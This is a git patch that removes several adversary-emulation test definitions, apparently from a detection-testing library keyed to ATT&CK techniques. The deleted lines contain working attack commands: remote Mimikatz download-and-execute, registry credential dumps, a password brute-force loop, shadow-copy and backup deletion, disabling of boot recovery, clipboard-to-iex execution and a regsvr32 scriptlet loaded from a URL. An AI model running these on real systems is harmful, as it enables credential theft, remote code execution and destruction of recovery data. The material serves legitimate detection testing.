From 5ed4e5e795076ac9232a278df31a44de975a9d8e Mon Sep 17 00:00:00 2001
From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com>
Date: Sat, 12 May 2018 14:51:01 -0600
Subject: [PATCH] clean up

---
 atomics/t1002/t1002.yaml   |  43 ----------
 atomics/t1003/t1003.yaml   |  58 --------------
 atomics/t1107/t1107.yaml   | 155 -------------------------------------
 atomics/t1110/t1110.yaml   |  35 ---------
 atomics/t1113/t1113.yaml   |  66 ----------------
 atomics/t1115/t1115.yaml   |  27 -------
 atomics/t1117/RegSvr32.sct |  23 ------
 atomics/t1117/t1117.yaml   |  45 -----------
 8 files changed, 452 deletions(-)
 delete mode 100644 atomics/t1002/t1002.yaml
 delete mode 100644 atomics/t1003/t1003.yaml
 delete mode 100644 atomics/t1107/t1107.yaml
 delete mode 100644 atomics/t1110/t1110.yaml
 delete mode 100644 atomics/t1113/t1113.yaml
 delete mode 100644 atomics/t1115/t1115.yaml
 delete mode 100644 atomics/t1117/RegSvr32.sct
 delete mode 100644 atomics/t1117/t1117.yaml

diff --git a/atomics/t1002/t1002.yaml b/atomics/t1002/t1002.yaml
deleted file mode 100644
index d7448dbd..00000000
--- a/atomics/t1002/t1002.yaml
+++ /dev/null
@@ -1,43 +0,0 @@
----
-attack_technique: T1002
-display_name: Data Compressed
-
-atomic_tests:
-- name: Compress Data for Exfiltration With PowerShell
-  description: |
-    TODO
-  supported_platforms:
-    - windows
-  input_arguments:
-    input_file:
-      description: Path that should be compressed into our output file
-      type: Path
-      default: C:\*
-    output_file:
-      description: Path where resulting compressed data should be placed
-      type: Path
-      default: C:\test\Data.zip
-  executor: 
-    name: powershell
-    command: |
-      dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
-
-- name: Compress Data for Exfiltration With Rar
-  description: |
-    TODO
-  supported_platforms:
-    - windows
-  input_argument:
-    input_file:
-      description: Path that should be compressed into our output file
-      type: Path
-      default: "*.docx"
-    output_file:
-      description: Path where resulting compressed data should be placed
-      type: Path
-      default: exfilthis.rar
-  executor: 
-    name: powershell
-    command: |
-      rar a -r #{output_file} #{input_file}
-  
\ No newline at end of file
diff --git a/atomics/t1003/t1003.yaml b/atomics/t1003/t1003.yaml
deleted file mode 100644
index 2226eac7..00000000
--- a/atomics/t1003/t1003.yaml
+++ /dev/null
@@ -1,58 +0,0 @@
----
-attack_technique: T1003
-display_name: Credential Dumping
-
-atomic_tests:
-- name: Powershell Mimikatz
-  description: |
-    Dumps Credentials via Powershell by invoking a remote mimikatz script
-  supported_platforms:
-    - windows
-  input_arguments:
-    remote_script:
-      description: URL to a remote Mimikatz script that dumps credentials
-      type: Url
-      default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
-  executor: 
-    name: powershell
-    command: |
-      IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
-
-- name: Gsecdump
-  description: |
-    https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
-  supported_platforms:
-    - windows
-  executor: 
-    name: command_prompt
-    command: |
-      gsecdump -a
-
-- name: Windows Credential Editor
-  description: |
-    http://www.ampliasecurity.com/research/windows-credentials-editor/
-  supported_platforms:
-    - windows
-  input_argument:
-    output_file:
-      description: Path where resulting data should be placed
-      type: Path
-      default: output.txt
-  executor: 
-    name: command_prompt
-    command: |
-      wce -o #{output_file}
-
-- name: Registry dump of SAM, creds, and secrets
-  description: |
-    Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated 
-    via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
-  supported_platforms:
-    - windows
-  executor: 
-    name: command_prompt
-    command: |
-      reg save HKLM\sam sam 
-      reg save HKLM\system system
-      reg save HKLM\security security
-
diff --git a/atomics/t1107/t1107.yaml b/atomics/t1107/t1107.yaml
deleted file mode 100644
index 0f8baae8..00000000
--- a/atomics/t1107/t1107.yaml
+++ /dev/null
@@ -1,155 +0,0 @@
----
-attack_technique: T1107
-display_name: File Deletion
-
-atomic_tests:
-- name: Victim configuration
-  description: |
-    Create a temporary directory and several files on the victim system for later deletion
-  supported_platforms:
-    - linux
-  executor:
-    name: sh
-    command: |
-      mkdir /tmp/victim-files
-      cd /tmp/victim-files
-      touch a b c d e f g
-      echo "This file will be shredded" > /tmp/victim-shred.txt
-
-- name: Delete a single file
-  description: |
-    Delete a single file from the temporary directory
-  supported_platforms:
-    - linux
-  executor:
-    name: sh
-    command: |
-      rm -f /tmp/victim-files/a
-
-- name: Delete an entire folder
-  description: |
-    Recursively delete the temporary directory and all files contained within it
-  supported_platforms:
-    - linux
-  executor:
-    name: sh
-    command: |
-      rm -rf /tmp/victim-files
-
-- name: Overwrite and delete a file with shred
-  description: |
-    Use the `shred` command to overwrite the temporary file and then delete it
-  supported_platforms:
-    - linux
-  executor:
-    name: sh
-    command: |
-      shred -u /tmp/victim-shred.txt
-
-- name: Victim configuration
-  description: |
-    Create a temporary directory and several files on the victim system for later deletion
-  supported_platforms:
-    - windows
-  executor:
-    name: command_prompt
-    command: |
-      mkdir %TEMP%\victim-files-cmd
-      cd %TEMP%\victim-files-cmd
-      type nul > a
-      type nul > b
-      type nul > c
-      type nul > d
-      type nul > e
-      type nul > f
-      type nul > g
-      mkdir %TEMP%\victim-files-ps
-      cd %TEMP%\victim-files-ps
-      type nul > a
-      type nul > b
-      type nul > c
-      type nul > d
-      type nul > e
-      type nul > f
-      type nul > g
-
-- name: Delete a single file - cmd
-  description: |
-    Delete a single file from the temporary directory using cmd.exe
-  supported_platforms:
-    - windows
-  executor:
-    name: command_prompt
-    command: |
-      del /f %TEMP%\victim-files-cmd\a
-
-- name: Delete an entire folder - cmd
-  description: |
-    Recursively delete the temporary directory and all files contained within it using cmd.exe
-  supported_platforms:
-    - windows
-  executor:
-    name: command_prompt
-    command: |
-      del /f /S %TEMP%\victim-files-cmd
-
-- name: Delete a single file - ps
-  description: |
-    Delete a single file from the temporary directory using Powershell
-  supported_platforms:
-    - windows
-  executor:
-    name: powershell
-    command: |
-      Remove-Item -path %TEMP%\victim-files-ps\a
-
-- name: Delete an entire folder - ps
-  description: |
-    Recursively delete the temporary directory and all files contained within it using Powershell
-  supported_platforms:
-    - windows
-  executor:
-    name: powershell
-    command: |
-      Remove-Item -path %TEMP%\victim-files-ps -recurse
-
-- name: Delete VSS - vssadmin
-  description: |
-    Delete all volume shadow copies with vssadmin.exe
-  supported_platforms:
-    - windows
-  executor:
-    name: command_prompt
-    command: |
-      vssadmin.exe Delete Shadows /All /Quiet
-
-- name: Delete VSS - wmic
-  description: |
-    Delete all volume shadow copies with wmic
-  supported_platforms:
-    - windows
-  executor:
-    name: command_prompt
-    command: |
-      wmic shadowcopy delete
-
-- name: bcdedit
-  description: |
-    xxx
-  supported_platforms:
-    - windows
-  executor:
-    name: command_prompt
-    command: |
-      bcdedit /set {default} bootstatuspolicy ignoreallfailures
-      bcdedit /set {default} recoveryenabled no
-
-- name: wbadmin
-  description: |
-    xxx
-  supported_platforms:
-    - windows
-  executor:
-    name: command_prompt
-    command: |
-      wbdadmin delete catalog -quiet
\ No newline at end of file
diff --git a/atomics/t1110/t1110.yaml b/atomics/t1110/t1110.yaml
deleted file mode 100644
index c04adfb5..00000000
--- a/atomics/t1110/t1110.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
----
-attack_technique: T1110
-display_name: Brute Force Credential Access
-
-atomic_tests:
-- name: Brute Force Credentials
-  description: |
-    Creates username and password files then attempts to brute force on remote host
-  supported_platforms:
-    - windows
-  input_arguments:
-    input_file_users:
-      description: Path to a file containing a list of users that we will attempt to brute force
-      type: Path
-      default: DomainUsers.txt
-    input_file_passwords:
-      description: Path to a file containing a list of passwords we will attempt to brute force with
-      type: Path
-      default: passwords.txt
-    remote_host:
-      description: Hostname of the target system we will brute force upon 
-      type: String
-      default: \\COMPANYDC1\IPC$
-    domain:
-      description: Domain name of the target system we will brute force upon 
-      type: String
-      default: YOUR_COMPANY
-  executor: 
-    name: command_prompt
-    command: |
-      net user /domain > #{input_file_users}
-      echo "Password1" >> #{input_file_passwords}
-      echo "1q2w3e4r" >> #{input_file_passwords}
-      echo "Password!" >> #{input_file_passwords}
-      @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
\ No newline at end of file
diff --git a/atomics/t1113/t1113.yaml b/atomics/t1113/t1113.yaml
deleted file mode 100644
index e365b5dd..00000000
--- a/atomics/t1113/t1113.yaml
+++ /dev/null
@@ -1,66 +0,0 @@
----
-attack_technique: T1113
-display_name: Screen Capture
-
-atomic_tests:
-- name: Screencapture
-  description: |
-    Use screencapture command to collect a full desktop screenshot
-  supported_platforms:
-    - macos
-  input_arguments:
-    output_file:
-      description: |
-        xxx
-      type: Path
-      default: desktop.png
-  executor:
-    name: bash
-    command: screencapture #{output_file}
-
-- name: Screencapture (silent)
-  description: |
-    Use screencapture command to collect a full desktop screenshot
-  supported_platforms:
-    - macos
-  input_arguments:
-    output_file:
-      description: |
-        xxx
-      type: Path
-      default: desktop.png
-  executor:
-    name: bash
-    command: screencapture -x #{output_file}
-
-- name: X Windows Capture
-  description: |
-    Use xwd command to collect a full desktop screenshot and review file with xwud
-  supported_platforms:
-    - linux
-  input_arguments:
-    output_file:
-      description: |
-        xxx
-      type: Path
-      default: desktop.xwd
-  executor:
-    name: bash
-    command: |
-      xwd -root -out #{output_file}
-      xwud -in #{output_file}
-
-- name: Import
-  description: |
-    Use import command to collect a full desktop screenshot
-  supported_platforms:
-    - linux
-  input_arguments:
-    output_file:
-      description: |
-        xxx
-      type: Path
-      default: desktop.png
-  executor:
-    name: bash
-    command: import -window root #{output_file}
\ No newline at end of file
diff --git a/atomics/t1115/t1115.yaml b/atomics/t1115/t1115.yaml
deleted file mode 100644
index 1a6208ff..00000000
--- a/atomics/t1115/t1115.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
----
-attack_technique: T1115
-display_name: Clipboard Data
-attack_link: https://attack.mitre.org/wiki/Technique/T1115
-
-atomic_tests:
-- name: Utilize Clipboard to store or execute commands from
-  description: |
-    Add data to clipboard to copy off or execute commands from.
-  supported_platforms:
-    - windows
-  executor:
-    name: command_prompt
-    command: |
-      dir | clip
-      clip < readme.txt
-
-- name: PowerShell
-  description: |
-    Utilize PowerShell to echo a command to clipboard and execute it
-  supported_platforms:
-    - windows
-  executor:
-    name: powershell
-    command: |
-      echo Get-Process | clip
-      Get-Clipboard | iex
\ No newline at end of file
diff --git a/atomics/t1117/RegSvr32.sct b/atomics/t1117/RegSvr32.sct
deleted file mode 100644
index 697938ed..00000000
--- a/atomics/t1117/RegSvr32.sct
+++ /dev/null
@@ -1,23 +0,0 @@
-<?XML version="1.0"?>
-<scriptlet>
-<registration 
-    progid="PoC"
-    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
-	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
-
-	<!-- .sct files when downloaded, are executed from a path like this -->
-	<!-- Please Note, file extenstion does not matter -->
-	<!-- Though, the name and extension are arbitary.. -->
-	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
-	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
-  	<!-- You can either execute locally, or from a url -->
-	<script language="JScript">
-		<![CDATA[
-	    		// calc.exe should launch, this could be any arbitrary code.
-      	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
-			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	
-	
-		]]>
-</script>
-</registration>
-</scriptlet>
diff --git a/atomics/t1117/t1117.yaml b/atomics/t1117/t1117.yaml
deleted file mode 100644
index 6d2b88bb..00000000
--- a/atomics/t1117/t1117.yaml
+++ /dev/null
@@ -1,45 +0,0 @@
-attack_technique: T1117
-display_name: Regsvr32
-atomic_tests:
-- name: Regsvr32 local COM scriptlet execution
-  description: |
-    Regsvr32.exe is a command-line program used to register and unregister OLE controls
-  supported_platforms:
-  - windows
-  input_arguments:
-   filename:
-    description: Name of the local file, include path.
-    type: Path
-    default: Regsvr32.sct
-  executor:
-   name: command_prompt
-   command: |
-    regsvr32.exe /s /u /i:#{filename} scrobj.dll
-- name: Regsvr32 remote COM scriptlet execution
-  description: |
-    Regsvr32.exe is a command-line program used to register and unregister OLE controls
-  supported_platforms:
-  - windows
-  input_arguments:
-   url:
-    description: URL to hosted sct file
-    type: Url
-    default: http://www.example.com/file.sct
-  executor:
-   name: command_prompt
-   command: |
-    regsvr32.exe /s /u /i:#{url} scrobj.dll
-- name: Regsvr32 local DLL execution
-  description: |
-    Regsvr32.exe is a command-line program used to register and unregister OLE controls
-  supported_platforms:
-  - windows
-  input_arguments:
-   dll_name:
-    description: Name of DLL to Execute, DLL Should export DllRegisterServer
-    type: Path
-    default: payload.dll
-  executor:
-   name: command_prompt
-   command: |
-    regsvr32.exe {dll_name}